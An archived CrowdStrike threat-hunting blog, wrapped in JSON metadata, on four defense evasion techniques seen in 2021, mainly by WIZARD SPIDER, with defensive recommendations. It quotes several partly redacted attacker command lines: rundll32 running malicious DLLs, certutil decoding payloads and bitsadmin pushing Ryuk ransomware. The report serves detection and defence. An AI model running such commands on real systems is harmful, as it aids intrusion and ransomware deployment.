{
	"id": "764b0f07-d150-49a5-a265-9be716c84cee",
	"created_at": "2026-04-06T00:18:01.006548Z",
	"updated_at": "2026-04-10T03:36:11.272403Z",
	"deleted_at": null,
	"sha1_hash": "3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0",
	"title": "4 Popular Defensive Evasion Techniques in 2021 | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 294097,
	"plain_text": "4 Popular Defensive Evasion Techniques in 2021 | CrowdStrike\r\nBy falcon.overwatch.team\r\nArchived: 2026-04-05 22:51:57 UTC\r\nThere is an endless struggle between hunters and adversaries. As soon as hunters shine a light on the latest\r\nmalicious activities, adversaries pivot and find a new way to hide in the shadows. Indeed, of all the MITRE\r\nATT\u0026CK® tactic groups, defense evasion stands out as having by far the most extensive array of techniques and\r\nsubtechniques. Whether these techniques are used to enable a “low and slow” strategic intrusion or to evade\r\ntechnology-based detections in a “smash and grab” attack, defense evasion is a critical step in adversaries’ kill-chain. This blog explores four popular defense evasion techniques that the Falcon OverWatch™ team has seen in\r\nuse by adversaries in 2021. It shares real-world examples of how OverWatch has observed these techniques and\r\nsub-techniques used by adversaries to subvert security controls and operate in a covert manner, and it provides\r\nguidance on how defenders can begin to look for the activity themselves.\r\n1. Signed Binary Proxy Execution: Rundll32\r\nTechnique Overview\r\nSigned binary proxy execution leverages legitimate built-in utilities to execute malicious commands. Adversaries\r\ntake advantage of trusted and commonly used utilities that are signed with digital certificates to proxy the\r\nexecution of malicious binaries. This example looks at the use of Rundll32.\r\nOverWatch Perspective\r\nThe anomalous use of rundll32.exe , coupled with irregular process activity and a burst of suspicious command\r\nline invocations, alerted OverWatch to potentially malicious activity. Deeper analysis confirmed the malicious\r\nactivity and linked it to the prolific eCrime adversary WIZARD SPIDER. 
The adversary gained initial remote\r\naccess after a phishing document was opened, resulting in arbitrary code execution under a productivity\r\napplication, and providing the adversary with interactive access to a valid user account. Additionally, the code\r\nexecution led to rundll32.exe being used to write a Cobalt Strike DLL to disk, allowing WIZARD SPIDER\r\nfurther capabilities to compromise the host. Once WIZARD SPIDER established interactive access, they wrote a\r\nfurther malicious DLL file to disk. They then used the below command to proxy the execution of the DLL through\r\na second rundll32.exe process.\r\nC:\\Windows\\System32\\rundll32.exe test.dll, test\r\nThe malicious DLL\r\nspawned a child process of rundll32.exe that was used to interact with explorer.exe. WIZARD SPIDER\r\nperformed host reconnaissance activity under the trusted explorer.exe process. OverWatch notified the victim\r\norganization in the early stages of this intrusion and armed them with the information needed to disrupt the\r\nadversary before they could move deeper into the network or execute any ransomware payloads.\r\nhttps://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/\r\nPage 1 of 7\n\nFigure 1. Execution of a malicious DLL via rundll32.exe, leading to injected threads into Explorer.exe and covert\r\nreconnaissance operations\r\nA consistent theme of this intrusion activity is WIZARD SPIDER’s efforts to conceal their operations by operating\r\nunder legitimate signed processes. While the victim organization was containing the host in response to the\r\nOverWatch notification, threat hunters observed the adversary continuing to conduct host and network\r\nenumeration activities consistent with early stage ransomware preparation operations. Ultimately, the rapid\r\nidentification of the activity by OverWatch threat hunters led to the timely delivery of an actionable notification to\r\nthe victim organization. 
This enabled them to quickly act to both contain and subsequently eradicate WIZARD\r\nSPIDER from the network before they could achieve their mission objectives.\r\nDefensive Recommendations\r\nMaintain a baseline of “known good” command line arguments, especially those associated with\r\nsigned binaries such as installutil.exe, msbuild.exe, mshta.exe and rundll32.exe.\r\nRemain alert to instances of productivity applications interacting suspiciously with system processes,\r\nas adversaries may inject a phishing payload into rundll32.exe. Inspecting file changes made by these\r\nutilities is also a great way to check for possible malicious use of signed binaries.\r\nFamiliarize yourself with the command line operators that adversaries can invoke in a malicious\r\nrundll32.exe function call. Additional operators can enable adversaries to modify or acquire files, or\r\neven execute arbitrary code such as JavaScript.\r\nMonitor file paths associated with DLLs being executed by rundll32.exe. For example, observing a\r\nDLL loaded from a suspicious path such as %Temp% would be highly unusual for most environments.\r\n2. Hijack Execution Flow: DLL Search Order Hijacking\r\nTechnique Overview\r\nDLL Search Order Hijacking takes advantage of how Windows handles DLLs and the search order it uses to\r\nlocate DLLs for loading into a program. Adversaries can hijack this search order mechanism to load a malicious\r\nDLL into a program in an attempt to bypass security controls.\r\nOverWatch Perspective\r\nOverWatch exposed the use of this technique by a likely China-nexus adversary. The adversary was discovered\r\noperating under a valid user account, having gained access by setting scheduled tasks via an RDP session. The\r\nadversary used Certutil commands to decode and execute binaries via a batch script. 
They also attempted to install\r\na PlugX implant using DLL search order hijacking in conjunction with a legitimate third-party antivirus\r\nexecutable and a weaponized DLL. The attacker had modified this DLL to perform reconnaissance and\r\nconnectivity testing under the legitimate Windows Service Host process, svchost.exe.\r\ncertutil -f -decode C:\\Programdata\\1.txt C:\\ProgramData\\\u003cREDACTED\u003e.exe\r\ncertutil -f -decode C:\\Programdata\\2.txt C:\\ProgramData\\\u003cREDACTED\u003e.dll\r\nOverWatch quickly uncovered this malicious activity by surfacing unusual\r\nexecution of certutil commands, along with attempts to set remote scheduled tasks and a range of system\r\ndiscovery activity.\r\nFigure 2. PlugX installation following DLL search order hijacking using a legitimate antivirus software binary and\r\na malicious DLL file\r\nDefensive Recommendations\r\nLook for any unusual process spawn events — context is key here, and it is important for defenders\r\nto not view events in isolation. Know which system events spawn following a known-good execution and\r\nsearch for any changes in this behavior. Note that adversaries may download programs to perform this\r\nattack if there is not a suitable option on the host.\r\nAnalyze exported functions to understand the DLL’s capabilities and which subsequent system calls\r\nyou can expect from a given application. It is also important to look for any DLLs that have the same file\r\nname but abnormal file paths.\r\nInvestigate changes to manifest files, such as anomalous modification or creation times. 
Legitimate\r\nmanifest files sometimes also include the hash of the legitimate DLL file, and therefore adversaries may\r\ntarget these files to alter or remove this protection in preparation for DLL search order hijacking.\r\nBe aware that adversaries will often use legitimate software such as Process Monitor to identify applications\r\nvulnerable to DLL search order hijacking by looking for DLLs being loaded without a full path being specified. It\r\nis therefore important to search for any DLL changes or suspicious process activity that occurs in parallel with a\r\nburst of reconnaissance or unknown network connections.\r\n3. Process Injection: DLL Injection\r\nTechnique Overview\r\nThe DLL injection technique enables adversaries to inject code from a malicious DLL and execute it under the\r\ncontext of a target process. With this technique, adversaries are able to harness the process’s resources to perform\r\nmalicious operations, all while being associated with a legitimate process. Process injection is a valuable\r\ntechnique for an attacker as it allows for the execution of code within the memory space of legitimate processes.\r\nThis makes detection challenging as malicious use of native Windows API behavior is generally quite difficult to\r\ndistinguish from legitimate API functions.\r\nOverWatch Perspective\r\nDLL injection was deployed in the early stages of an attempted ransomware operation, which aligns with activity\r\npreviously attributed to WIZARD SPIDER. This intrusion took place in the wake of a successful phishing attack.\r\nVarious malicious files were written to disk, including multiple executables and a DLL file, each masquerading as\r\nlegitimate browser files. Analysis showed that the DLL file was intended to provide a means of performing\r\nprocess injection, and the executables allowed for subsequent reconnaissance and command and control in\r\npreparation for ransomware deployment. 
As seen below, once the malicious DLL file was executed, the entry\r\npoint “Mars” was located, and the associated code was launched, allowing injection and reconnaissance to be\r\nperformed. From there, OverWatch identified communication with multiple processes, including terminal services\r\nthat the adversary likely intended to use for further hands-on command execution.\r\nC:\\WINDOWS\\system32\\cmd.exe /C rundll32 \u003cREDACTED\u003e.dll, Mars\r\nOverWatch recognized suspicious remote threads being created alongside\r\nirregular process tree activity and suspicious reconnaissance activity. Any one of these on their own may have\r\nbeen dismissed, but analyzed together they paint a clear picture of a hands-on intrusion. OverWatch was able to\r\nleverage this aggregate view to rapidly identify and escalate the intrusion to the victim organization, which in turn\r\nenabled the victim to contain the adversary before they could complete their mission.\r\nFigure 3. DLL injection leading to injected threads into various processes for reconnaissance and C2 operations\r\nDefensive Recommendations\r\nInvestigate inconsistencies with typical execution, such as processes performing unknown network\r\nconnections or reading/writing files to disk. It can also help to look for instances where processes load\r\nunknown or abnormal DLLs during runtime. Furthermore, concomitant network connections or\r\ncommunication between additional internal endpoints may be an indication of post-compromise command\r\nand control traffic.\r\nReview API calls associated with suspicious processes. VirtualAllocEx and WriteProcessMemory are\r\nexamples of APIs that are often leveraged by adversaries to tamper with process memory and perform DLL\r\nInjection. Preventing this activity is difficult because limiting access to APIs may prevent legitimate\r\nsoftware from functioning. 
It is therefore important to leverage human analysts to dig into this activity.\r\n4. BITS Jobs\r\nTechnique Overview\r\nWindows Background Intelligent Transfer Service (BITS) is a file transfer mechanism used by some applications\r\nto transfer files using only idle bandwidth. BITS jobs are used to schedule these file transfers and can be used by\r\nadversaries to download and execute files. BITS jobs are appealing to adversaries trying to covertly upload or\r\ndownload files because they are ubiquitous within many environments and commonly used in a legitimate\r\nadministrative context.\r\nOverWatch Perspective\r\nThe next example also examines WIZARD SPIDER activity, which reflects just how prolific this group has been\r\nin the past year, and the variety of techniques they have used. In this intrusion, OverWatch observed WIZARD\r\nSPIDER using BITS jobs during an attempted Ryuk ransomware deployment. The following command line\r\nhighlights one such attempt to use BITS jobs to push the Ryuk ransomware binary. WIZARD SPIDER scheduled\r\nthe operation using BITSadmin, the tool used to create BITS transfer jobs. In this case, it is likely that WIZARD\r\nSPIDER intended to infect the domain controllers to improve their chances of extracting payment.\r\ncmd.exe /c bitsadmin /transfer \u003cREDACTED\u003e \\\\10.\u003cREDACTED\u003e\\share$\\\u003cREDACTED\u003e.exe C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roa\r\nDuring this intrusion, WIZARD SPIDER appeared to focus on a distinct set of objectives and set scheduled tasks\r\nto attempt this BITSadmin transfer of Ryuk routinely using Windows Management Instrumentation (WMI). 
WMI\r\nis often seen during hunting operations as a way for adversaries to perform local and remote command execution.\r\nThis is another example of a native tool used in normal operations by administrators, a further indication of\r\ntheir comfort in using native tools to carry out their intrusion. OverWatch identified this activity due to observing\r\nglobally rare BITS transfer commands alongside anomalous administrative tool usage, one of which was WMIC.\r\nWhen it comes to isolating potentially malicious tool usage under valid accounts, human hunters are best placed to\r\ninvestigate the surrounding context that helps distinguish between what could be legitimate or illegitimate.\r\nDefensive Recommendations\r\nRoutinely investigate BITS activity and instances of command line transfers. System logs and the\r\nBITS job database are rich hunting grounds — it is crucial to validate which tasks are scheduled and if\r\nthere are any unknown jobs. BITS jobs can also be invoked using PowerShell, so logs such as the\r\nScriptBlockText log can be a useful place for identifying BITS requests.\r\nBe mindful that BITS jobs will almost never be blocked as they are required for Windows updates.\r\nMonitor network connections associated with BITS jobs to gain insight into potential abuse of BITS\r\njobs and bitsadmin.exe.\r\nHunt regularly, as BITS jobs can be scheduled for up to 90 days, and adversaries have been known\r\nto prepare transfer tasks to run at a later date. It is also important to ensure appropriate logging is\r\navailable to enable detailed analysis of BITS jobs.\r\nAnalyze the file paths involved in BITS activity and check for signs of the adversary manipulating\r\nthe query strings to evade detection or potentially using encoding to obfuscate their requests.\r\nLook for instances of unapproved software usage and analyze any existing programs that could be\r\nleveraged to transfer code internally. 
Adversaries actively look for built-in utilities that can be used to\r\nconfigure malicious commands. Some frequently used utilities in addition to BITS include scheduled tasks\r\non Windows systems and cron and nohup on Linux systems. Third-party tooling can also be used to\r\nconfigure tasks and transfer jobs.\r\nConclusion\r\nSo far this year, OverWatch has identified more than 60 defense evasion techniques and subtechniques being used\r\nby adversaries in the wild during interactive intrusions. These techniques are explicitly designed to evade\r\ntechnology-based defenses, and as seen in the examples explored here, they leverage native utilities in an attempt\r\nto blend in with expected activity. The OverWatch SEARCH methodology draws together human expertise,\r\nsystematic processes and world-class technology to continuously refine hunting activity and stay a step ahead of\r\nthe threat. In combination, these elements enable OverWatch to quickly and effectively identify covert activity and\r\nnotify victims in near real time. A crucial step in the SEARCH methodology is “Hone” — the stage at which new\r\nhunting findings are operationalized as hunting leads or fed back into the platform as detections to drive\r\ncontinuous improvement. Each new find paints a clearer picture of adversary activity and enables threat hunters to\r\nredouble their efforts hunting for evasive techniques that cannot be found by technology alone. OverWatch\r\nrecommends that defenders employ a systemic approach — such as the SEARCH methodology — to derive\r\nmaximum value from hunting efforts. 
With such a wide variety of defense evasion techniques at adversaries’\r\ndisposal, it is critical for defenders to remain informed of the techniques that adversaries are currently using to try\r\nto hide in victim environments.\r\nAdditional Resources\r\nRead about the latest trends in threat hunting and more in the 2021 Threat Hunting Report.\r\nLearn more about Falcon OverWatch proactive managed threat hunting.\r\nWatch this video to see how Falcon OverWatch proactively hunts for threats in your environment.\r\nRead more about how hunting part-time is simply not enough in this CrowdStrike blog.\r\nLearn more about the CrowdStrike Falcon® platform by visiting the product webpage.\r\nTest CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/"
	],
	"report_names": [
		"four-popular-defensive-evasion-techniques-in-2021"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434681,
	"ts_updated_at": 1775792171,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.pdf",
		"text": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.txt",
		"img": "https://archive.orkl.eu/3e517c11e1a8b709d48700f4c8d4c75dd58ceeb0.jpg"
	}
}